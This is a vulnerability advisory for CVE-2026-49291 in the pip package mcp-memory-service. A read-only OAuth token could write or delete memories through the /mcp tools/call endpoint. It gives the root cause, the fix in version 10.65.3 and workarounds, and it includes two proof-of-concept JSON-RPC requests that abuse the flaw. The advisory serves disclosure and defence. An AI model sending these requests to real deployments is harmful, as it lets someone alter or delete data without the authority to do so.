high · 8.1CVE-2026-49291Jun 26, 2026

CVE-2026-49291: mcp-memory-service Missing Authorization on MCP tools/call

Shubham Kandhare
Security Engagement Manager, SecureLayer7

A read-only OAuth token can write or delete memories through the MCP JSON-RPC endpoint, bypassing the write-scope checks that protect the equivalent REST API routes.

Packagemcp-memory-service
Ecosystempip
Affected<= 10.65.1
Fixed in10.65.3

The problem

The HTTP MCP endpoint at /mcp was decorated with only require_read_access. When a tools/call request arrived, the handler extracted the tool name and arguments and called handle_tool_call(storage, tool_name, arguments) without forwarding the authenticated user or checking a per-tool required scope.

The MCP tool registry exposed both read and write tools behind that single read-scoped gate. store_memory and delete_memory were reachable with only a read token, while the matching REST endpoints (POST /api/memories, DELETE /api/memories/:hash) correctly used require_write_access and returned 403 for the same token.

Proof of concept

http
POST /mcp
Authorization: Bearer <read-only-oauth-token>
Content-Type: application/json

{
  "jsonrpc": "2.0",
  "id": 1,
  "method": "tools/call",
  "params": {
    "name": "store_memory",
    "arguments": {
      "content": "mcp read scope stored this",
      "tags": ["poc"]
    }
  }
}

---

# To delete an existing memory with the same read-only token:
POST /mcp
Authorization: Bearer <read-only-oauth-token>
Content-Type: application/json

{
  "jsonrpc": "2.0",
  "id": 2,
  "method": "tools/call",
  "params": {
    "name": "delete_memory",
    "arguments": {"content_hash": "<known_hash>"}
  }
}

The root cause is a missing per-tool authorization check at tools/call dispatch time (CWE-862). The mcp_endpoint dependency only validated that the caller held any valid OAuth token with read scope. It never consulted a tool-to-scope mapping before invoking the handler, so the scope boundary enforced on the REST layer simply did not exist on the MCP layer.

The patch in PR #1004 (v10.65.3) introduced per-tool scope enforcement inside the tools/call dispatch path. Mutating tools (store_memory, delete_memory, and related write operations) now require the caller to hold write scope, and the check fires before the handler reaches storage.

A read-only token now receives a scope error at the MCP layer, matching the behavior already present on the REST endpoints.

The fix

Upgrade mcp-memory-service to 10.65.3 or later (pip install --upgrade mcp-memory-service). The fix adds per-tool scope checks inside the tools/call dispatch in src/mcp_memory_service/web/api/mcp.py (PR #1004). No configuration changes are required after upgrading.

If you cannot upgrade immediately, disable OAuth read-only clients or restrict /mcp to write-scoped tokens at your reverse proxy.

Reporter not attributed.

References: [1][2][3][4][5]